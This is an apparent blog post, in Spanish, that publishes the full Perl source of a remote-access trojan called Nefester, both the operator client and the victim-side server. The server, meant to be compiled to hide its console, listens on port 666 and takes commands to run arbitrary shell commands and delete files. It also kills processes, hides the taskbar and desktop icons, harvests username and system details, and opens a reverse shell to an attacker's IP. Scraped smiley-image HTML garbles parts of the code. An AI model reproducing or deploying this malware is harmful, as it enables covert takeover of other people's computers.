Mostrar Informacion
Navegador de archivos
Cambiar directorio de navegacion
Crear archivo
Borrar archivo
Borrar directorio
Reproducir musica o videos poniendo la ruta en la opcion
Parar reproduccion
Abrir lectora de CD
Cerrar lectora de CD
Puertos abiertos
Mensaje
Ejecutar comandos
Esconder barra de tareas
Devolver barra de tareas
Esconder iconos del escritorio
Devolver iconos del escritorio
Administrar procesos con posibilidad de cerrar el que quieran
Reverse Shell si es que quieren ejecutar comandos de forma mas comoda
El codigo del cliente es este
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 | #!usr/bin/perl #Nefester (Cliente) 0.1 By Doddy H use IO::Socket; use Cwd; &menu; sub head { system 'cls'; print q( E F TT E NNNNNNNEEEEEE FFFFFF AAA SSSSSTTTTTTEEEEEE RRRRRR NN NN E EE FFFF A AA S S T TT T E EE RRRRR NNNNN E EE FF F AAAAA S T TT E EE RR R NNNNN EEEEE FFFFF AAA AA SSS S TT EEEEE RRRRR NNNNN E EEE FFF AAAAA S SSS TT E EEE RR R NN NN EEEE E FF AAA AA SS SS TT EEEE E RR R NNN NN EEEEEEEFFFF AAA AAA SSS TTTT EEEEEEE RRR RR SS R R ); } sub menu { &head; print "[Target] : "; chomp(my $ip = <STDIN>); my $socket = new IO::Socket::INET( PeerAddr => $ip, PeerPort => 666, Proto => 'tcp', Timeout => 5 ); if ($socket) { $socket->close; &menuo($ip); } else { print "\n\n[-] Target no infectado\n"; <STDIN>; &menu; } } sub menuo { &head; print "[$_[0]] : Servidor Activado\n\n"; print q( 1 : Informacion 2 : Navegador 3 : Abrir CD 4 : Cerrar CD 5 : Puertos abiertos 6 : Mensaje 7 : CMD 8 : Esconder barra de tareas 9 : Devolver barra de tareas 10 : Esconder iconos 11 : Devolver iconos 12 : Administrar procesos 13 : Reverse Shell 14 : Cambiar IP 15 : Salir ); print "[Opcion] : "; chomp(my $opcion = <STDIN>); if ($opcion eq 1) { print "\n\n</li><li type="square"> Informacion\n\n";[/li][/list] $re = daryrecibir($_[0],"infor"); if ($re=~/:(.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*):/) { print "[Dominio] : $1\n"; print "[Chip] : $2\n"; print "[Version] : $3\n"; print "[Nombre] : $4\n"; print "[OS] : $5\n"; <stdin>; } &menuo($_[0]); } elsif ($opcion eq 2) { menu1: print "\n\n</li><li type="square"> Navegacion de archivos\n\n";[/li][/list] $cwd = daryrecibir($_[0],"getcwd"."\r\n"); print "tengo $cwd\n"; show($_[0],"/"); &menu2; sub menu2 { print "\n\n[Opciones]\n\n"; print "1 - Cambiar directorio\n"; print "2 - Crear archivo\n"; print "3 - Borrar archivo\n"; print "4 - Borrar directorio\n"; print "5 - Reproducir musica\n"; print "6 - Parar reproduccion\n"; print "7 - Volver al menu inicial\n\n"; print "[Opcion] : "; chomp(my $op = <stdin>); if ($op eq 1) { print "\n\n</li><li type="square"> Directorio : ";[/li][/list] chomp (my $dir=<stdin>); $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA"); if ($ver=~/ok/ig) { print "\n\n</li><li type="square"> Directory changed\n\n";[/li][/list] } show($_[0],$dir); &menu2; <stdin>; } elsif ($op eq 2) { print "\n\n[Nombre] : "; chomp(my $name = <stdin>); print "\n\n[Contenido] : "; chomp(my $code = <stdin>); daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY"); print "\n\n</li><li type="square"> Archivo creado \n\n";[/li][/list] <stdin>; } elsif ($op eq 3) { print "\n\n[Archivo a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n</li><li type="square"> Archivo Borrado\n\n";[/li][/list] } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 4) { print "\n\n[Directorio a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n</li><li type="square"> Directorio Borrado\n\n";[/li][/list] } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 5) { print "\n\n[Archivo] : "; chomp(my $file = <stdin>); print "\n\n</li><li type="square"> Reproduciendo\n\n";[/li][/list] daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA"); <stdin>; } elsif ($op eq 6) { print "\n\n</li><li type="square"> Reproduccion detenida\n\n";[/li][/list] daryrecibir($_[0],"pararmusic"); <stdin>; } elsif ($op eq 7) { &menuo($_[0]); } else { show($_[0],"/"); } goto menu1; } } elsif ($opcion eq 3) { daryrecibir($_[0],"opencd"); &menuo($_[0]); } elsif ($opcion eq 4) { daryrecibir($_[0],"closedcd"); &menuo($_[0]); } elsif ($opcion eq 5) { print "\n[Puertos Abiertos]\n\n"; $re = daryrecibir($_[0],"porters"); while ($re=~/:(.*?):/ig) { if ($1 ne "") { print "</li><li type="square"> $1\n";[/li][/list] } } <stdin>; &menuo($_[0]); } elsif ($opcion eq 6) { print "\n[Mensaje] : "; chomp (my $msg = <stdin>); daryrecibir($_[0],"msgbox $msg"); <stdin>; &menuo($_[0]); } elsif ($opcion eq 7) { menu: my $cmd,$re; print "\n\n>"; chomp(my $cmd= <stdin>); if ($cmd=~/exit/ig) { &menuo($_[0]); } $re = daryrecibir($_[0],"comando :$cmd:"); print "\n".$re; goto menu; &menuo($_[0]); } elsif ($opcion eq <img src="https://underc0de.org/foro/Smileys/default/cool.gif" alt="8)" title="Cool" class="smiley" /> { daryrecibir($_[0],"iniciochau"); &menuo($_[0]); } elsif ($opcion eq 9) { daryrecibir($_[0],"iniciovuelve"); &menuo($_[0]); } elsif ($opcion eq 10) { daryrecibir($_[0],"iconochau"); &menuo($_[0]); } elsif ($opcion eq 11) { daryrecibir($_[0],"iconovuelve"); &menuo($_[0]); } elsif ($opcion eq 12) { &reload($_[0]); sub reload { my @pro; my @pids; my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex "mostrarpro"."\r\n"; $sockex->read($re,5000); $sockex->close; chomp $re; print "\n\n</li><li type="square"> Procesos encontrados\n\n";[/li][/list] while ($re=~/PROXEC(.*?)PROXEC/ig) { if ($1 ne "") { push(@pro,$1); } } while ($re=~/PIDX(.*?)PIDX/ig) { if ($1 ne "") { push(@pids,$1); } } $cantidad = int(@pro); for my $num(1..$cantidad) { if ($pro[$num] ne "") { print "\n</li><li type="square"> Proceso : ".$pro[$num]."\n";[/li][/list] print "</li><li type="square"> PIDS : ".$pids[$num]."\n"; [/li][/list] } } print q( [Opciones] 1 - Refrescar lista 2 - Cerrar procesos 3 - Volver al menu ); print "\n[Opcion] : "; chomp(my $opc = <stdin>); if ($opc=~/1/ig) { &reload($_[0]); } elsif($opc=~/2/ig) { print "\n</li><li type="square"> Write the name of the process : ";[/li][/list] chomp(my $numb = <stdin>); print "\n</li><li type="square"> Write the PID of the process : ";[/li][/list] chomp(my $pid = <stdin>); $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA"); if ($re=~/ok/ig) { print "\n\n</li><li type="square"> Proceso cerrado\n\n";[/li][/list] } else { print "\n\n[-] Error\n\n"; } <stdin>; &reload($_[0]); } elsif($opc=~/3/ig) { &menuo($_[0]); } else { &reload; } } } elsif ($opcion eq 13) { print "\n\n[IP] : "; chomp(my $ip = <stdin>); print "\n\n[Port] : "; chomp(my $port = <stdin>); print "\n\n</li><li type="square"> Connected !!!\n\n";[/li][/list] $re = daryrecibir($_[0],"backshell :$ip:$port:"); } elsif ($opcion eq 14) { &menu; } elsif ($opcion eq 15) { exit 1; } else { &menuo; } } sub daryrecibir { my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex $_[1]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r"; } sub show { my $re = daryrecibir($_[0],"getcwd"."\r\n"); print "\n\n</li><li type="square"> Directorio Actual : $re\n\n";[/li][/list] $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n"); print "\n\n[Directorios]\n\n"; while ($re1=~/DIREX(.*?)DIREX/ig) { if ($1 ne "") { print "</li><li type="square"> $1\n";[/li][/list] } } print "\n\n[Archivos]\n\n"; while ($re1=~/FILEX(.*?)FILEX/ig) { if ($1 ne "") { print "</li><li type="square"> $1\n";[/li][/list] } } } # # ¿ The End ? # |
Y el server
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 | #!/usr/bin/perl #Nefester (sERVidor) 0.1 By Doddy H #Compilar con perl2exe para sacar consola use IO::Socket; use Socket; use Win32; use Cwd; use Win32::MediaPlayer; use Win32::Process::List; use Win32::Process; use Win32::API; use constant SW_HIDE => 0; use constant SW_SHOWNORMAL => 1; my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N'); my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N'); $test = new Win32::MediaPlayer; my $sock = IO::Socket::INET->new(LocalPort => 666, Listen => 10, Proto => 'tcp', Reuse => 1); print "online\n"; while (my $con = $sock->accept){ $resultado = <$con>; print "boludo mando : $resultado\n"; if ($resultado=~/msgbox (.*)/ig) { Win32::MsgBox($1,0,"Mensaje de Dios") } if ($resultado=~/backshell <img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*):/ig) { my ($ip,$port) = ($1,$2); print "conectando $ip con $port\n"; $ip =~s/(\s)+$//; $port =~s/(\s)+$//; conectar($ip,$port); tipo(); sub conectar { socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp')); connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n</li><li type="disc"> Reverse Shell Starting...\n\n";[/li][/list] if ($^O =~/Win32/ig) { infowin(); system("cmd.exe"); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "</li><li type="square"> Domain Name : ".Win32::DomainName()."\n";[/li][/list] print "</li><li type="square"> OS Version : ".Win32::GetOSName()."\n";[/li][/list] print "</li><li type="square"> Username : ".Win32::LoginName()."\n\n\n";[/li][/list] } sub infolinux { print "</li><li type="square"> System information\n\n";[/li][/list] system("uname -a"); print "\n\n"; } } if ($resultado =~/opencd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door open', $rta, 127, 0); print $con "ok"."\r\n"; } if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) { my ($pid,$numb) = ($1,$2); $pid=~s/(\s)+$//; $numb=~s/(\s)+$//; if (Win32::Process::KillProcess($pid,$numb)) { print $con "ok\r\n"; } } if ($resultado =~/closedcd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door closed', $rta, 127, 0); print $con "ok"."\r\n"; } if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) { my $filex = $1; $filex =~s/(\s)+$//; print getcwd()."/".$filex."\n\n"; if (unlink(getcwd()."/".$filex)) { print $con "ok\r\n"; } } if ($resultado=~/infor/ig) { print "mando"; use Win32; my $domain = Win32::DomainName(); my $chip = Win32::GetChipName(); my $version = Win32::GetOSVersion(); my $nombre = Win32::LoginName(); my $os = Win32::GetOSName(); print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n"; } if ($resultado=~/porters/ig) { use Net::Netstat::Wrapper; $por = ""; @ports = Net::Netstat::Wrapper->only_port(); for(@ports) { $por = $por.":".$_; } print $con $por."\r\n"; } if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) { my $cancion = $1; $cancion =~s/(\s)+$//; $test->load($cancion); $test->play; } if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) { my $dir = $1; $dir =~s/(\s)+$//; if (chdir($dir)) { print $con "ok\r\n"; } } if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) { my $veox = $1; $veox =~s/(\s)+$//; if (rmdir(getcwd()."/".$veox)) { print $con "ok\r\n"; } } if ($resultado=~/pararmusic/ig) { $test->close; } if ($resultado=~/dirnow ACATOY(.*)/ig) { my $real = $1; chomp $real; $real =~s/(\s)+$//; print "real $real\n\n"; my @archivos = coleccionar($real); for (@archivos) { print $_."\n"; my $todo = $real."/".$_; print $todo."\n"; if (-f $todo) { print $con "FILEX".$_."FILEX"."\r\n"; print "File : ".$_."\n"; } if (-d $todo) { print $con "DIREX".$_."DIREX"."\r\n"; print "Dir : ".$_."\n"; } } } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } if ($resultado=~/getcwd/ig) { print "envie ".getcwd()."\n\n"; print $con getcwd()."\r\n"; } if ($resultado=~/mostrarpro/ig) { my $new = Win32::Process::List->new(); my %process = $new->GetProcesses(); for my $pid (keys %process) { print $con "PROXEC".$process{$pid}."PROXEC\r\n"; print $con "PIDX".$pid."PIDX\r\n"; } } if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) { my $name = $1; my $file = $2; chomp $name; chomp $file; $name =~s/(\s)+$//; $file =~s/(\s)+$//; print "name is $name end\n"; print "file is $file end\n"; open FILE,">>".$name; print FILE $file."\n"; close FILE; } if ($resultado=~/comando <img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.*):/ig) { print "llego comando $1\n"; print $resultado; my $temp = qx($1); print $con $temp."\r"; } if ($resultado=~/iniciochau/g) { inicio_chau("Shell_TrayWnd"); } if ($resultado=~/iniciovuelve/g) { inicio_vuelve("Shell_TrayWnd"); } else { print $resultado; } if ($resultado=~/iconovuelve/g) { icono_vuelve("Program Manager"); } if ($resultado=~/iconochau/g) { icono_chau("Program Manager"); } sub icono_vuelve { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_SHOWNORMAL); } sub icono_chau { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_HIDE); } sub inicio_vuelve { $handlex = $a->Call($_[0],0); $b->Call($handlex,SW_SHOWNORMAL); } sub inicio_chau { $handlea = $a->Call($_[0],0); $b->Call($handlea,SW_HIDE); } } # ¿ The End ? |
0 comentarios: sobre [Perl] Nefaster
Publicar un comentario para [Perl] Nefaster